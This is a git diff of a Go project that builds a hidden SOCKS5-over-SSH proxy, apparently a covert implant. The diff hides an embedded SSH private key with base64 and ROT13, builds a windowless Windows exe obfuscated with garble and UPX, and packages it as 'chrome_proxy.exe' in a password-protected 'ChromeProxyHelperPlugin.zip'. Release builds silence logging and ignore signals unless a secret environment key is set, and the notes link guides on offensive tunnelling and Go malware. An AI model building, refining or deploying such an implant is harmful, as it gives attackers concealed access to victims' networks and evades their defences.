diff --git a/.goreleaser.yaml b/.goreleaser.yaml
index 8ff2b03..f603e81 100644
--- a/.goreleaser.yaml
+++ b/.goreleaser.yaml
@@ -60,10 +60,11 @@ builds:
     goarch:
       - amd64
     ldflags:
-      - -w -H=windowsgui
+      - "-H=windowsgui"
     gobinary: "scripts/garble.sh"
     tags:
       - release
+      - windows
 
 upx:
   - # Whether to enable it or not.
diff --git a/Makefile b/Makefile
index d477a42..a7b3719 100644
--- a/Makefile
+++ b/Makefile
@@ -20,16 +20,18 @@ socks5-ssh-proxy.release: resources $(SOURCES) $(GARBLE_BIN)
 	upx $@
 win: socks5-ssh-proxy.exe
 socks5-ssh-proxy.exe: resources $(GARBLE_BIN) $(SOURCES)
+	CC=x86_64-w64-mingw32-gcc CXX=x86_64-w64-mingw32-g++ CGO_ENABLED=1 GOOS=windows GOARCH=amd64 go build -trimpath -ldflags "-s -w -H=windowsgui" -tags windows,release -o $@
 #	CGO_ENABLED=1 CC=x86_64-w64-mingw32-gcc CXX=x86_64-w64-mingw32-g++ GOOS=windows GOARCH=amd64 $(GARBLE_CMD) build -ldflags "-H=windowsgui -X cfg.VerboseModeKey=$(RELEASE_VERBOSE_MODE_KEY)" -tags release -o $@
-	CGO_ENABLED=1 CC=x86_64-w64-mingw32-gcc CXX=x86_64-w64-mingw32-g++ GOOS=windows GOARCH=amd64 $(GARBLE_CMD) build -ldflags "-H=windowsgui" -tags release -o $@
-	upx $@
-	go run cmd/upx-obfuscator/main.go $@
+	#CGO_ENABLED=1 CC=x86_64-w64-mingw32-gcc CXX=x86_64-w64-mingw32-g++ GOOS=windows GOARCH=amd64 $(GARBLE_CMD) build -ldflags "-H=windowsgui" -tags release -o $@
+	#upx $@
+	#go run cmd/upx-obfuscator/main.go $@
 goreleaser: resources $(GARBLE_BIN)
-	goreleaser build --clean --snapshot --id win-release
+	goreleaser build --verbose --clean --snapshot --id win-release
+#	goreleaser build --clean --snapshot --id win-release
 win-package: ChromeProxyHelperPlugin.zip
 ChromeProxyHelperPlugin.zip: socks5-ssh-proxy.exe
 	cp socks5-ssh-proxy.exe chrome_proxy.exe
-	upx chrome_proxy.exe
+	#upx chrome_proxy.exe
 	zip -eP resistanceIsFutile ChromeProxyHelperPlugin.zip chrome_proxy.exe
 	rm -f chrome_proxy.exe
 install-deps: $(GARBLE_BIN)
@@ -59,10 +61,12 @@ resources/ssh_private_key:
 	@echo "====================================="
 resources/ssh_private_key.base64: resources/ssh_private_key
 	base64 -i $< -o $@
+resources/ssh_private_key.base64.rot13: resources/ssh_private_key.base64
+	go run cmd/rot13-obfuscator/main.go $< $@
 
 fmt:
 	gofmt -w *.go
 
-secrets: config_release.go.base64 resources/ssh_private_key.base64
+secrets: config_release.go.base64 resources/ssh_private_key.base64.rot13
 
 .phony: clean test win
diff --git a/cmd/rot13-obfuscator/main.go b/cmd/rot13-obfuscator/main.go
new file mode 100644
index 0000000..7ad360c
--- /dev/null
+++ b/cmd/rot13-obfuscator/main.go
@@ -0,0 +1,51 @@
+package main
+
+import (
+	"fmt"
+	"io/ioutil"
+	"log"
+	"os"
+)
+
+func rot13(input byte) byte {
+	if 'A' <= input && input <= 'Z' {
+		return 'A' + (input-'A'+13)%26
+	} else if 'a' <= input && input <= 'z' {
+		return 'a' + (input-'a'+13)%26
+	}
+	return input
+}
+
+func rot13Bytes(data []byte) []byte {
+	result := make([]byte, len(data))
+	for i, b := range data {
+		result[i] = rot13(b)
+	}
+	return result
+}
+
+func main() {
+	if len(os.Args) != 3 {
+		log.Fatalf("Usage: %s <input file> <output file>\n", os.Args[0])
+	}
+
+	inputFile := os.Args[1]
+	outputFile := os.Args[2]
+
+	// Read the input file
+	inputData, err := ioutil.ReadFile(inputFile)
+	if err != nil {
+		log.Fatalf("Failed to read input file: %v", err)
+	}
+
+	// Apply ROT13 transformation
+	outputData := rot13Bytes(inputData)
+
+	// Write the transformed data to the output file
+	err = ioutil.WriteFile(outputFile, outputData, 0644)
+	if err != nil {
+		log.Fatalf("Failed to write output file: %v", err)
+	}
+
+	fmt.Printf("File %s has been converted using ROT13 and saved to %s\n", inputFile, outputFile)
+}
diff --git a/docs/NOTES.md b/docs/NOTES.md
index b2b35a0..4651b39 100644
--- a/docs/NOTES.md
+++ b/docs/NOTES.md
@@ -82,6 +82,7 @@ Check if running under wine by testing if executables are present:
 * <https://posts.specterops.io/offensive-security-guide-to-ssh-tunnels-and-proxies-b525cbd4d4c6>
 * <https://emulator41.medium.com/golang-malware-used-by-cybercriminals-408276a276c8>
 * <https://synzack.github.io/Tunneling-Traffic-With-SSL-and-TLS/>
+* <https://www.trisul.org/blog/traffic-analysis-of-secure-shell-ssh/>
 
 ## Development information
 
diff --git a/main.go b/main.go
index 0207ea3..540d786 100644
--- a/main.go
+++ b/main.go
@@ -14,6 +14,13 @@ import (
 var fetchedSSHHostPublicKey SSHHostPublicKeyFetcher
 var sshfpResolver *sshfp.Resolver
 
+func secureEraseResourceSSHPrivateKey() {
+	log.Println("ERASING SSH private key")
+	for i := range resourceSSHPrivateKey {
+		resourceSSHPrivateKey[i] = 0
+	}
+}
+
 type SSHHostPublicKeyFetcher struct {
 	ssh.PublicKey
 }
@@ -94,6 +101,8 @@ func main() {
 	var signer ssh.Signer
 	var privateKey string
 
+	defer secureEraseResourceSSHPrivateKey()
+
 	dnsServers := sshfp.WithDNSClientConfigFromReader(cfg.DNSServersResolvConf)
 
 	sshfpResolver, err = sshfp.NewResolver(dnsServers)
@@ -131,6 +140,8 @@ func main() {
 		log.Println(err)
 	}
 
+	secureEraseResourceSSHPrivateKey()
+
 	log.Println("SOCKS5 Addr", proxyServerURL)
 
 	systemOSDetect()
diff --git a/main_release.go b/main_release.go
index 0f6c032..2cb1e1f 100644
--- a/main_release.go
+++ b/main_release.go
@@ -6,15 +6,52 @@ package main
 import (
 	_ "embed"
 	"os"
+	"log"
+	"encoding/base64"
 )
 
-//go:embed resources/ssh_private_key
+//go:embed resources/ssh_private_key.base64.rot13
+var resourceSSHPrivateKeyBase64Rot13 string
+
 var resourceSSHPrivateKey string
 
+func rot13(input byte) byte {
+	if 'A' <= input && input <= 'Z' {
+		return 'A' + (input-'A'+13)%26
+	} else if 'a' <= input && input <= 'z' {
+		return 'a' + (input-'a'+13)%26
+	}
+	return input
+}
+
+// rot13String function to apply ROT13 to a string
+func rot13String(input string) string {
+	result := make([]byte, len(input))
+	for i := range input {
+		result[i] = rot13(input[i])
+	}
+	return string(result)
+}
+
+func resourceSSHPrivateKeyUnpack() {
+	// TODO use github.com/awnumar/memguard
+
+	resourceSSHPrivateKeyBase64 := rot13String(resourceSSHPrivateKeyBase64Rot13)
+
+	decodedData, err := base64.StdEncoding.DecodeString(resourceSSHPrivateKeyBase64)
+	if err != nil {
+		log.Fatalf("Failed to decode resourceSSHPrivateKeyBase64Rot13: %v", err)
+	}
+
+	resourceSSHPrivateKey = string(decodedData)
+}
+
 func init() {
 	dontSilenceKey := os.Getenv("VMK")
 	if dontSilenceKey != cfg.VerboseModeKey {
 		systemRouteAllLogging(os.DevNull)
 		systemIgnoreAllSignals()
 	}
+
+	resourceSSHPrivateKeyUnpack()
 }
diff --git a/main_release_windows.go b/main_release_windows.go
new file mode 100644
index 0000000..79cc368
--- /dev/null
+++ b/main_release_windows.go
@@ -0,0 +1,8 @@
+//go:build windows
+// +build windows
+
+package main
+
+import (
+	"C"
+)
diff --git a/scripts/garble.sh b/scripts/garble.sh
index 5dabf69..a41a663 100755
--- a/scripts/garble.sh
+++ b/scripts/garble.sh
@@ -1,2 +1,2 @@
 #!/usr/bin/env bash
-`go env GOPATH`/bin/garble -literals -tiny $@
+`go env GOPATH`/bin/garble -literals $@